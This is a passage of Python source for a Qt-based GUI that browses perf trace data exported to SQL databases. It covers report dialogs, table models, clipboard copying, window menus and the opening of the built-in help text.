if not self.IsNumber(input_string.strip()):
return self.InvalidValue(input_string)
value = int(input_string.strip())
if value <= 0:
return self.InvalidValue(input_string)
self.value = str(value)
# Dialog data item converted and validated using a SQL table
class SQLTableDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, table_name, match_column, column_name1, column_name2, parent):
super(SQLTableDataItem, self).__init__(glb, label, placeholder_text, parent)
self.table_name = table_name
self.match_column = match_column
self.column_name1 = column_name1
self.column_name2 = column_name2
def ValueToIds(self, value):
ids = []
query = QSqlQuery(self.glb.db)
stmt = "SELECT id FROM " + self.table_name + " WHERE " + self.match_column + " = '" + value + "'"
ret = query.exec_(stmt)
if ret:
while query.next():
ids.append(str(query.value(0)))
return ids
def DoValidate(self, input_string):
all_ids = []
for value in [x.strip() for x in input_string.split(",")]:
ids = self.ValueToIds(value)
if len(ids):
all_ids.extend(ids)
else:
return self.InvalidValue(value)
self.value = self.column_name1 + " IN (" + ",".join(all_ids) + ")"
if self.column_name2:
self.value = "( " + self.value + " OR " + self.column_name2 + " IN (" + ",".join(all_ids) + ") )"
# Sample time ranges dialog data item converted and validated using 'samples' SQL table
class SampleTimeRangesDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, column_name, parent):
self.column_name = column_name
self.last_id = 0
self.first_time = 0
self.last_time = 2 ** 64
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, time FROM samples ORDER BY id DESC LIMIT 1")
if query.next():
self.last_id = int(query.value(0))
self.last_time = int(query.value(1))
QueryExec(query, "SELECT time FROM samples WHERE time != 0 ORDER BY id LIMIT 1")
if query.next():
self.first_time = int(query.value(0))
if placeholder_text:
placeholder_text += ", between " + str(self.first_time) + " and " + str(self.last_time)
super(SampleTimeRangesDataItem, self).__init__(glb, label, placeholder_text, parent)
def IdBetween(self, query, lower_id, higher_id, order):
QueryExec(query, "SELECT id FROM samples WHERE id > " + str(lower_id) + " AND id < " + str(higher_id) + " ORDER BY id " + order + " LIMIT 1")
if query.next():
return True, int(query.value(0))
else:
return False, 0
def BinarySearchTime(self, lower_id, higher_id, target_time, get_floor):
query = QSqlQuery(self.glb.db)
while True:
next_id = int((lower_id + higher_id) / 2)
QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
if not query.next():
ok, dbid = self.IdBetween(query, lower_id, next_id, "DESC")
if not ok:
ok, dbid = self.IdBetween(query, next_id, higher_id, "")
if not ok:
return str(higher_id)
next_id = dbid
QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
next_time = int(query.value(0))
if get_floor:
if target_time > next_time:
lower_id = next_id
else:
higher_id = next_id
if higher_id <= lower_id + 1:
return str(higher_id)
else:
if target_time >= next_time:
lower_id = next_id
else:
higher_id = next_id
if higher_id <= lower_id + 1:
return str(lower_id)
def ConvertRelativeTime(self, val):
mult = 1
suffix = val[-2:]
if suffix == "ms":
mult = 1000000
elif suffix == "us":
mult = 1000
elif suffix == "ns":
mult = 1
else:
return val
val = val[:-2].strip()
if not self.IsNumber(val):
return val
val = int(val) * mult
if val >= 0:
val += self.first_time
else:
val += self.last_time
return str(val)
def ConvertTimeRange(self, vrange):
if vrange[0] == "":
vrange[0] = str(self.first_time)
if vrange[1] == "":
vrange[1] = str(self.last_time)
vrange[0] = self.ConvertRelativeTime(vrange[0])
vrange[1] = self.ConvertRelativeTime(vrange[1])
if not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
return False
beg_range = max(int(vrange[0]), self.first_time)
end_range = min(int(vrange[1]), self.last_time)
if beg_range > self.last_time or end_range < self.first_time:
return False
vrange[0] = self.BinarySearchTime(0, self.last_id, beg_range, True)
vrange[1] = self.BinarySearchTime(1, self.last_id + 1, end_range, False)
return True
def AddTimeRange(self, value, ranges):
n = value.count("-")
if n == 1:
pass
elif n == 2:
if value.split("-")[1].strip() == "":
n = 1
elif n == 3:
n = 2
else:
return False
pos = findnth(value, "-", n)
vrange = [value[:pos].strip() ,value[pos+1:].strip()]
if self.ConvertTimeRange(vrange):
ranges.append(vrange)
return True
return False
def DoValidate(self, input_string):
ranges = []
for value in [x.strip() for x in input_string.split(",")]:
if not self.AddTimeRange(value, ranges):
return self.InvalidValue(value)
ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
self.value = " OR ".join(ranges)
# Report Dialog Base
class ReportDialogBase(QDialog):
def __init__(self, glb, title, items, partial, parent=None):
super(ReportDialogBase, self).__init__(parent)
self.glb = glb
self.report_vars = ReportVars()
self.setWindowTitle(title)
self.setMinimumWidth(600)
self.data_items = [x(glb, self) for x in items]
self.partial = partial
self.grid = QGridLayout()
for row in xrange(len(self.data_items)):
self.grid.addWidget(QLabel(self.data_items[row].label), row, 0)
self.grid.addWidget(self.data_items[row].widget, row, 1)
self.status = QLabel()
self.ok_button = QPushButton("Ok", self)
self.ok_button.setDefault(True)
self.ok_button.released.connect(self.Ok)
self.ok_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.cancel_button = QPushButton("Cancel", self)
self.cancel_button.released.connect(self.reject)
self.cancel_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.hbox = QHBoxLayout()
#self.hbox.addStretch()
self.hbox.addWidget(self.status)
self.hbox.addWidget(self.ok_button)
self.hbox.addWidget(self.cancel_button)
self.vbox = QVBoxLayout()
self.vbox.addLayout(self.grid)
self.vbox.addLayout(self.hbox)
self.setLayout(self.vbox)
def Ok(self):
vars = self.report_vars
for d in self.data_items:
if d.id == "REPORTNAME":
vars.name = d.value
if not vars.name:
self.ShowMessage("Report name is required")
return
for d in self.data_items:
if not d.IsValid():
return
for d in self.data_items[1:]:
if d.id == "LIMIT":
vars.limit = d.value
elif len(d.value):
if len(vars.where_clause):
vars.where_clause += " AND "
vars.where_clause += d.value
if len(vars.where_clause):
if self.partial:
vars.where_clause = " AND ( " + vars.where_clause + " ) "
else:
vars.where_clause = " WHERE " + vars.where_clause + " "
self.accept()
def ShowMessage(self, msg):
self.status.setText("<font color=#FF0000>" + msg)
def ClearMessage(self):
self.status.setText("")
# Selected branch report creation dialog
class SelectedBranchDialog(ReportDialogBase):
def __init__(self, glb, parent=None):
title = "Selected Branches"
items = (lambda g, p: LineEditDataItem(g, "Report name:", "Enter a name to appear in the window title bar", p, "REPORTNAME"),
lambda g, p: SampleTimeRangesDataItem(g, "Time ranges:", "Enter time ranges", "samples.id", p),
lambda g, p: NonNegativeIntegerRangesDataItem(g, "CPUs:", "Enter CPUs or ranges e.g. 0,5-6", "cpu", p),
lambda g, p: SQLTableDataItem(g, "Commands:", "Only branches with these commands will be included", "comms", "comm", "comm_id", "", p),
lambda g, p: SQLTableDataItem(g, "PIDs:", "Only branches with these process IDs will be included", "threads", "pid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "TIDs:", "Only branches with these thread IDs will be included", "threads", "tid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "DSOs:", "Only branches with these DSOs will be included", "dsos", "short_name", "samples.dso_id", "to_dso_id", p),
lambda g, p: SQLTableDataItem(g, "Symbols:", "Only branches with these symbols will be included", "symbols", "name", "symbol_id", "to_symbol_id", p),
lambda g, p: LineEditDataItem(g, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", p))
super(SelectedBranchDialog, self).__init__(glb, title, items, True, parent)
# Event list
def GetEventList(db):
events = []
query = QSqlQuery(db)
QueryExec(query, "SELECT name FROM selected_events WHERE id > 0 ORDER BY id")
while query.next():
events.append(query.value(0))
return events
# Is a table selectable
def IsSelectable(db, table, sql = "", columns = "*"):
query = QSqlQuery(db)
try:
QueryExec(query, "SELECT " + columns + " FROM " + table + " " + sql + " LIMIT 1")
except:
return False
return True
# SQL table data model item
class SQLTableItem():
def __init__(self, row, data):
self.row = row
self.data = data
def getData(self, column):
return self.data[column]
# SQL table data model
class SQLTableModel(TableModel):
progress = Signal(object)
def __init__(self, glb, sql, column_headers, parent=None):
super(SQLTableModel, self).__init__(parent)
self.glb = glb
self.more = True
self.populated = 0
self.column_headers = column_headers
self.fetcher = SQLFetcher(glb, sql, lambda x, y=len(column_headers): self.SQLTableDataPrep(x, y), self.AddSample)
self.fetcher.done.connect(self.Update)
self.fetcher.Fetch(glb_chunk_sz)
def DisplayData(self, item, index):
self.FetchIfNeeded(item.row)
return item.getData(index.column())
def AddSample(self, data):
child = SQLTableItem(self.populated, data)
self.child_items.append(child)
self.populated += 1
def Update(self, fetched):
if not fetched:
self.more = False
self.progress.emit(0)
child_count = self.child_count
count = self.populated - child_count
if count > 0:
parent = QModelIndex()
self.beginInsertRows(parent, child_count, child_count + count - 1)
self.insertRows(child_count, count, parent)
self.child_count += count
self.endInsertRows()
self.progress.emit(self.child_count)
def FetchMoreRecords(self, count):
current = self.child_count
if self.more:
self.fetcher.Fetch(count)
else:
self.progress.emit(0)
return current
def HasMoreRecords(self):
return self.more
def columnCount(self, parent=None):
return len(self.column_headers)
def columnHeader(self, column):
return self.column_headers[column]
def SQLTableDataPrep(self, query, count):
data = []
for i in xrange(count):
data.append(query.value(i))
return data
# SQL automatic table data model
class SQLAutoTableModel(SQLTableModel):
def __init__(self, glb, table_name, parent=None):
sql = "SELECT * FROM " + table_name + " WHERE id > $$last_id$$ ORDER BY id LIMIT " + str(glb_chunk_sz)
if table_name == "comm_threads_view":
# For now, comm_threads_view has no id column
sql = "SELECT * FROM " + table_name + " WHERE comm_id > $$last_id$$ ORDER BY comm_id LIMIT " + str(glb_chunk_sz)
column_headers = []
query = QSqlQuery(glb.db)
if glb.dbref.is_sqlite3:
QueryExec(query, "PRAGMA table_info(" + table_name + ")")
while query.next():
column_headers.append(query.value(1))
if table_name == "sqlite_master":
sql = "SELECT * FROM " + table_name
else:
if table_name[:19] == "information_schema.":
sql = "SELECT * FROM " + table_name
select_table_name = table_name[19:]
schema = "information_schema"
else:
select_table_name = table_name
schema = "public"
QueryExec(query, "SELECT column_name FROM information_schema.columns WHERE table_schema = '" + schema + "' and table_name = '" + select_table_name + "'")
while query.next():
column_headers.append(query.value(0))
if pyside_version_1 and sys.version_info[0] == 3:
if table_name == "samples_view":
self.SQLTableDataPrep = self.samples_view_DataPrep
if table_name == "samples":
self.SQLTableDataPrep = self.samples_DataPrep
super(SQLAutoTableModel, self).__init__(glb, sql, column_headers, parent)
def samples_view_DataPrep(self, query, count):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, count):
data.append(query.value(i))
return data
def samples_DataPrep(self, query, count):
data = []
for i in xrange(9):
data.append(query.value(i))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(9)))
for i in xrange(10, count):
data.append(query.value(i))
return data
# Base class for custom ResizeColumnsToContents
class ResizeColumnsToContentsBase(QObject):
def __init__(self, parent=None):
super(ResizeColumnsToContentsBase, self).__init__(parent)
def ResizeColumnToContents(self, column, n):
# Using the view's resizeColumnToContents() here is extrememly slow
# so implement a crude alternative
font = self.view.font()
metrics = QFontMetrics(font)
max = 0
for row in xrange(n):
val = self.data_model.child_items[row].data[column]
len = metrics.width(str(val) + "MM")
max = len if len > max else max
val = self.data_model.columnHeader(column)
len = metrics.width(str(val) + "MM")
max = len if len > max else max
self.view.setColumnWidth(column, max)
def ResizeColumnsToContents(self):
n = min(self.data_model.child_count, 100)
if n < 1:
# No data yet, so connect a signal to notify when there is
self.data_model.rowsInserted.connect(self.UpdateColumnWidths)
return
columns = self.data_model.columnCount()
for i in xrange(columns):
self.ResizeColumnToContents(i, n)
def UpdateColumnWidths(self, *x):
# This only needs to be done once, so disconnect the signal now
self.data_model.rowsInserted.disconnect(self.UpdateColumnWidths)
self.ResizeColumnsToContents()
# Convert value to CSV
def ToCSValue(val):
if '"' in val:
val = val.replace('"', '""')
if "," in val or '"' in val:
val = '"' + val + '"'
return val
# Key to sort table model indexes by row / column, assuming fewer than 1000 columns
glb_max_cols = 1000
def RowColumnKey(a):
return a.row() * glb_max_cols + a.column()
# Copy selected table cells to clipboard
def CopyTableCellsToClipboard(view, as_csv=False, with_hdr=False):
indexes = sorted(view.selectedIndexes(), key=RowColumnKey)
idx_cnt = len(indexes)
if not idx_cnt:
return
if idx_cnt == 1:
with_hdr=False
min_row = indexes[0].row()
max_row = indexes[0].row()
min_col = indexes[0].column()
max_col = indexes[0].column()
for i in indexes:
min_row = min(min_row, i.row())
max_row = max(max_row, i.row())
min_col = min(min_col, i.column())
max_col = max(max_col, i.column())
if max_col > glb_max_cols:
raise RuntimeError("glb_max_cols is too low")
max_width = [0] * (1 + max_col - min_col)
for i in indexes:
c = i.column() - min_col
max_width[c] = max(max_width[c], len(str(i.data())))
text = ""
pad = ""
sep = ""
if with_hdr:
model = indexes[0].model()
for col in range(min_col, max_col + 1):
val = model.headerData(col, Qt.Horizontal)
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
c = col - min_col
max_width[c] = max(max_width[c], len(val))
width = max_width[c]
align = model.headerData(col, Qt.Horizontal, Qt.TextAlignmentRole)
if align & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
text += "\n"
pad = ""
sep = ""
last_row = min_row
for i in indexes:
if i.row() > last_row:
last_row = i.row()
text += "\n"
pad = ""
sep = ""
if as_csv:
text += sep + ToCSValue(str(i.data()))
sep = ","
else:
width = max_width[i.column() - min_col]
if i.data(Qt.TextAlignmentRole) & Qt.AlignRight:
val = str(i.data()).rjust(width)
else:
val = str(i.data())
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
QApplication.clipboard().setText(text)
def CopyTreeCellsToClipboard(view, as_csv=False, with_hdr=False):
indexes = view.selectedIndexes()
if not len(indexes):
return
selection = view.selectionModel()
first = None
for i in indexes:
above = view.indexAbove(i)
if not selection.isSelected(above):
first = i
break
if first is None:
raise RuntimeError("CopyTreeCellsToClipboard internal error")
model = first.model()
row_cnt = 0
col_cnt = model.columnCount(first)
max_width = [0] * col_cnt
indent_sz = 2
indent_str = " " * indent_sz
expanded_mark_sz = 2
if sys.version_info[0] == 3:
expanded_mark = "\u25BC "
not_expanded_mark = "\u25B6 "
else:
expanded_mark = unicode(chr(0xE2) + chr(0x96) + chr(0xBC) + " ", "utf-8")
not_expanded_mark = unicode(chr(0xE2) + chr(0x96) + chr(0xB6) + " ", "utf-8")
leaf_mark = " "
if not as_csv:
pos = first
while True:
row_cnt += 1
row = pos.row()
for c in range(col_cnt):
i = pos.sibling(row, c)
if c:
n = len(str(i.data()))
else:
n = len(str(i.data()).strip())
n += (i.internalPointer().level - 1) * indent_sz
n += expanded_mark_sz
max_width[c] = max(max_width[c], n)
pos = view.indexBelow(pos)
if not selection.isSelected(pos):
break
text = ""
pad = ""
sep = ""
if with_hdr:
for c in range(col_cnt):
val = model.headerData(c, Qt.Horizontal, Qt.DisplayRole).strip()
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
max_width[c] = max(max_width[c], len(val))
width = max_width[c]
align = model.headerData(c, Qt.Horizontal, Qt.TextAlignmentRole)
if align & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
text += "\n"
pad = ""
sep = ""
pos = first
while True:
row = pos.row()
for c in range(col_cnt):
i = pos.sibling(row, c)
val = str(i.data())
if not c:
if model.hasChildren(i):
if view.isExpanded(i):
mark = expanded_mark
else:
mark = not_expanded_mark
else:
mark = leaf_mark
val = indent_str * (i.internalPointer().level - 1) + mark + val.strip()
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
width = max_width[c]
if c and i.data(Qt.TextAlignmentRole) & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
pos = view.indexBelow(pos)
if not selection.isSelected(pos):
break
text = text.rstrip() + "\n"
pad = ""
sep = ""
QApplication.clipboard().setText(text)
def CopyCellsToClipboard(view, as_csv=False, with_hdr=False):
view.CopyCellsToClipboard(view, as_csv, with_hdr)
def CopyCellsToClipboardHdr(view):
CopyCellsToClipboard(view, False, True)
def CopyCellsToClipboardCSV(view):
CopyCellsToClipboard(view, True, True)
# Context menu
class ContextMenu(object):
def __init__(self, view):
self.view = view
self.view.setContextMenuPolicy(Qt.CustomContextMenu)
self.view.customContextMenuRequested.connect(self.ShowContextMenu)
def ShowContextMenu(self, pos):
menu = QMenu(self.view)
self.AddActions(menu)
menu.exec_(self.view.mapToGlobal(pos))
def AddCopy(self, menu):
menu.addAction(CreateAction("&Copy selection", "Copy to clipboard", lambda: CopyCellsToClipboardHdr(self.view), self.view))
menu.addAction(CreateAction("Copy selection as CS&V", "Copy to clipboard as CSV", lambda: CopyCellsToClipboardCSV(self.view), self.view))
def AddActions(self, menu):
self.AddCopy(menu)
class TreeContextMenu(ContextMenu):
def __init__(self, view):
super(TreeContextMenu, self).__init__(view)
def AddActions(self, menu):
i = self.view.currentIndex()
text = str(i.data()).strip()
if len(text):
menu.addAction(CreateAction('Copy "' + text + '"', "Copy to clipboard", lambda: QApplication.clipboard().setText(text), self.view))
self.AddCopy(menu)
# Table window
class TableWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
def __init__(self, glb, table_name, parent=None):
super(TableWindow, self).__init__(parent)
self.data_model = LookupCreateModel(table_name + " Table", lambda: SQLAutoTableModel(glb, table_name))
self.model = QSortFilterProxyModel()
self.model.setSourceModel(self.data_model)
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.view.sortByColumn(-1, Qt.AscendingOrder)
self.view.setSortingEnabled(True)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTableCellsToClipboard
self.ResizeColumnsToContents()
self.context_menu = ContextMenu(self.view)
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.data_model)
self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, table_name + " Table")
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.mapFromSource(self.data_model.index(row, 0, QModelIndex())))
else:
self.find_bar.NotFound()
# Table list
def GetTableList(glb):
tables = []
query = QSqlQuery(glb.db)
if glb.dbref.is_sqlite3:
QueryExec(query, "SELECT name FROM sqlite_master WHERE type IN ( 'table' , 'view' ) ORDER BY name")
else:
QueryExec(query, "SELECT table_name FROM information_schema.tables WHERE table_schema = 'public' AND table_type IN ( 'BASE TABLE' , 'VIEW' ) ORDER BY table_name")
while query.next():
tables.append(query.value(0))
if glb.dbref.is_sqlite3:
tables.append("sqlite_master")
else:
tables.append("information_schema.tables")
tables.append("information_schema.views")
tables.append("information_schema.columns")
return tables
# Top Calls data model
class TopCallsModel(SQLTableModel):
def __init__(self, glb, report_vars, parent=None):
text = ""
if not glb.dbref.is_sqlite3:
text = "::text"
limit = ""
if len(report_vars.limit):
limit = " LIMIT " + report_vars.limit
sql = ("SELECT comm, pid, tid, name,"
" CASE"
" WHEN (short_name = '[kernel.kallsyms]') THEN '[kernel]'" + text +
" ELSE short_name"
" END AS dso,"
" call_time, return_time, (return_time - call_time) AS elapsed_time, branch_count, "
" CASE"
" WHEN (calls.flags = 1) THEN 'no call'" + text +
" WHEN (calls.flags = 2) THEN 'no return'" + text +
" WHEN (calls.flags = 3) THEN 'no call/return'" + text +
" ELSE ''" + text +
" END AS flags"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" INNER JOIN comms ON calls.comm_id = comms.id"
" INNER JOIN threads ON calls.thread_id = threads.id" +
report_vars.where_clause +
" ORDER BY elapsed_time DESC" +
limit
)
column_headers = ("Command", "PID", "TID", "Symbol", "Object", "Call Time", "Return Time", "Elapsed Time (ns)", "Branch Count", "Flags")
self.alignment = (Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignLeft)
super(TopCallsModel, self).__init__(glb, sql, column_headers, parent)
def columnAlignment(self, column):
return self.alignment[column]
# Top Calls report creation dialog
class TopCallsDialog(ReportDialogBase):
def __init__(self, glb, parent=None):
title = "Top Calls by Elapsed Time"
items = (lambda g, p: LineEditDataItem(g, "Report name:", "Enter a name to appear in the window title bar", p, "REPORTNAME"),
lambda g, p: SQLTableDataItem(g, "Commands:", "Only calls with these commands will be included", "comms", "comm", "comm_id", "", p),
lambda g, p: SQLTableDataItem(g, "PIDs:", "Only calls with these process IDs will be included", "threads", "pid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "TIDs:", "Only calls with these thread IDs will be included", "threads", "tid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "DSOs:", "Only calls with these DSOs will be included", "dsos", "short_name", "dso_id", "", p),
lambda g, p: SQLTableDataItem(g, "Symbols:", "Only calls with these symbols will be included", "symbols", "name", "symbol_id", "", p),
lambda g, p: LineEditDataItem(g, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", p),
lambda g, p: PositiveIntegerDataItem(g, "Record limit:", "Limit selection to this number of records", p, "LIMIT", "100"))
super(TopCallsDialog, self).__init__(glb, title, items, False, parent)
# Top Calls window
class TopCallsWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
def __init__(self, glb, report_vars, parent=None):
super(TopCallsWindow, self).__init__(parent)
self.data_model = LookupCreateModel("Top Calls " + report_vars.UniqueId(), lambda: TopCallsModel(glb, report_vars))
self.model = self.data_model
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTableCellsToClipboard
self.context_menu = ContextMenu(self.view)
self.ResizeColumnsToContents()
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.model)
self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name)
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
else:
self.find_bar.NotFound()
# Action Definition
def CreateAction(label, tip, callback, parent=None, shortcut=None):
action = QAction(label, parent)
if shortcut != None:
action.setShortcuts(shortcut)
action.setStatusTip(tip)
action.triggered.connect(callback)
return action
# Typical application actions
def CreateExitAction(app, parent=None):
return CreateAction("&Quit", "Exit the application", app.closeAllWindows, parent, QKeySequence.Quit)
# Typical MDI actions
def CreateCloseActiveWindowAction(mdi_area):
return CreateAction("Cl&ose", "Close the active window", mdi_area.closeActiveSubWindow, mdi_area)
def CreateCloseAllWindowsAction(mdi_area):
return CreateAction("Close &All", "Close all the windows", mdi_area.closeAllSubWindows, mdi_area)
def CreateTileWindowsAction(mdi_area):
return CreateAction("&Tile", "Tile the windows", mdi_area.tileSubWindows, mdi_area)
def CreateCascadeWindowsAction(mdi_area):
return CreateAction("&Cascade", "Cascade the windows", mdi_area.cascadeSubWindows, mdi_area)
def CreateNextWindowAction(mdi_area):
return CreateAction("Ne&xt", "Move the focus to the next window", mdi_area.activateNextSubWindow, mdi_area, QKeySequence.NextChild)
def CreatePreviousWindowAction(mdi_area):
return CreateAction("Pre&vious", "Move the focus to the previous window", mdi_area.activatePreviousSubWindow, mdi_area, QKeySequence.PreviousChild)
# Typical MDI window menu
class WindowMenu():
def __init__(self, mdi_area, menu):
self.mdi_area = mdi_area
self.window_menu = menu.addMenu("&Windows")
self.close_active_window = CreateCloseActiveWindowAction(mdi_area)
self.close_all_windows = CreateCloseAllWindowsAction(mdi_area)
self.tile_windows = CreateTileWindowsAction(mdi_area)
self.cascade_windows = CreateCascadeWindowsAction(mdi_area)
self.next_window = CreateNextWindowAction(mdi_area)
self.previous_window = CreatePreviousWindowAction(mdi_area)
self.window_menu.aboutToShow.connect(self.Update)
def Update(self):
self.window_menu.clear()
sub_window_count = len(self.mdi_area.subWindowList())
have_sub_windows = sub_window_count != 0
self.close_active_window.setEnabled(have_sub_windows)
self.close_all_windows.setEnabled(have_sub_windows)
self.tile_windows.setEnabled(have_sub_windows)
self.cascade_windows.setEnabled(have_sub_windows)
self.next_window.setEnabled(have_sub_windows)
self.previous_window.setEnabled(have_sub_windows)
self.window_menu.addAction(self.close_active_window)
self.window_menu.addAction(self.close_all_windows)
self.window_menu.addSeparator()
self.window_menu.addAction(self.tile_windows)
self.window_menu.addAction(self.cascade_windows)
self.window_menu.addSeparator()
self.window_menu.addAction(self.next_window)
self.window_menu.addAction(self.previous_window)
if sub_window_count == 0:
return
self.window_menu.addSeparator()
nr = 1
for sub_window in self.mdi_area.subWindowList():
label = str(nr) + " " + sub_window.name
if nr < 10:
label = "&" + label
action = self.window_menu.addAction(label)
action.setCheckable(True)
action.setChecked(sub_window == self.mdi_area.activeSubWindow())
action.triggered.connect(lambda a=None,x=nr: self.setActiveSubWindow(x))
self.window_menu.addAction(action)
nr += 1
def setActiveSubWindow(self, nr):
self.mdi_area.setActiveSubWindow(self.mdi_area.subWindowList()[nr - 1])
# Help text
glb_help_text = """
<h1>Contents</h1>
<style>
p.c1 {
text-indent: 40px;
}
p.c2 {
text-indent: 80px;
}
}
</style>
<p class=c1><a href=#reports>1. Reports</a></p>
<p class=c2><a href=#callgraph>1.1 Context-Sensitive Call Graph</a></p>
<p class=c2><a href=#calltree>1.2 Call Tree</a></p>
<p class=c2><a href=#allbranches>1.3 All branches</a></p>
<p class=c2><a href=#selectedbranches>1.4 Selected branches</a></p>
<p class=c2><a href=#topcallsbyelapsedtime>1.5 Top calls by elapsed time</a></p>
<p class=c1><a href=#tables>2. Tables</a></p>
<h1 id=reports>1. Reports</h1>
<h2 id=callgraph>1.1 Context-Sensitive Call Graph</h2>
The result is a GUI window with a tree representing a context-sensitive
call-graph. Expanding a couple of levels of the tree and adjusting column
widths to suit will display something like:
<pre>
Call Graph: pt_example
Call Path Object Count Time(ns) Time(%) Branch Count Branch Count(%)
v- ls
v- 2638:2638
v- _start ld-2.19.so 1 10074071 100.0 211135 100.0
|- unknown unknown 1 13198 0.1 1 0.0
>- _dl_start ld-2.19.so 1 1400980 13.9 19637 9.3
>- _d_linit_internal ld-2.19.so 1 448152 4.4 11094 5.3
v-__libc_start_main@plt ls 1 8211741 81.5 180397 85.4
>- _dl_fixup ld-2.19.so 1 7607 0.1 108 0.1
>- __cxa_atexit libc-2.19.so 1 11737 0.1 10 0.0
>- __libc_csu_init ls 1 10354 0.1 10 0.0
|- _setjmp libc-2.19.so 1 0 0.0 4 0.0
v- main ls 1 8182043 99.6 180254 99.9
</pre>
<h3>Points to note:</h3>
<ul>
<li>The top level is a command name (comm)</li>
<li>The next level is a thread (pid:tid)</li>
<li>Subsequent levels are functions</li>
<li>'Count' is the number of calls</li>
<li>'Time' is the elapsed time until the function returns</li>
<li>Percentages are relative to the level above</li>
<li>'Branch Count' is the total number of branches for that function and all functions that it calls
</ul>
<h3>Find</h3>
Ctrl-F displays a Find bar which finds function names by either an exact match or a pattern match.
The pattern matching symbols are ? for any character and * for zero or more characters.
<h2 id=calltree>1.2 Call Tree</h2>
The Call Tree report is very similar to the Context-Sensitive Call Graph, but the data is not aggregated.
Also the 'Count' column, which would be always 1, is replaced by the 'Call Time'.
<h2 id=allbranches>1.3 All branches</h2>
The All branches report displays all branches in chronological order.
Not all data is fetched immediately. More records can be fetched using the Fetch bar provided.
<h3>Disassembly</h3>
Open a branch to display disassembly. This only works if:
<ol>
<li>The disassembler is available. Currently, only Intel XED is supported - see <a href=#xed>Intel XED Setup</a></li>
<li>The object code is available. Currently, only the perf build ID cache is searched for object code.
The default directory ~/.debug can be overridden by setting environment variable PERF_BUILDID_DIR.
One exception is kcore where the DSO long name is used (refer dsos_view on the Tables menu),
or alternatively, set environment variable PERF_KCORE to the kcore file name.</li>
</ol>
<h4 id=xed>Intel XED Setup</h4>
To use Intel XED, libxed.so must be present. To build and install libxed.so:
<pre>
git clone https://github.com/intelxed/mbuild.git mbuild
git clone https://github.com/intelxed/xed
cd xed
./mfile.py --share
sudo ./mfile.py --prefix=/usr/local install
sudo ldconfig
</pre>
<h3>Instructions per Cycle (IPC)</h3>
If available, IPC information is displayed in columns 'insn_cnt', 'cyc_cnt' and 'IPC'.
<p><b>Intel PT note:</b> The information applies to the blocks of code ending with, and including, that branch.
Due to the granularity of timing information, the number of cycles for some code blocks will not be known.
In that case, 'insn_cnt', 'cyc_cnt' and 'IPC' are zero, but when 'IPC' is displayed it covers the period
since the previous displayed 'IPC'.
<h3>Find</h3>
Ctrl-F displays a Find bar which finds substrings by either an exact match or a regular expression match.
Refer to Python documentation for the regular expression syntax.
All columns are searched, but only currently fetched rows are searched.
<h2 id=selectedbranches>1.4 Selected branches</h2>
This is the same as the <a href=#allbranches>All branches</a> report but with the data reduced
by various selection criteria. A dialog box displays available criteria which are AND'ed together.
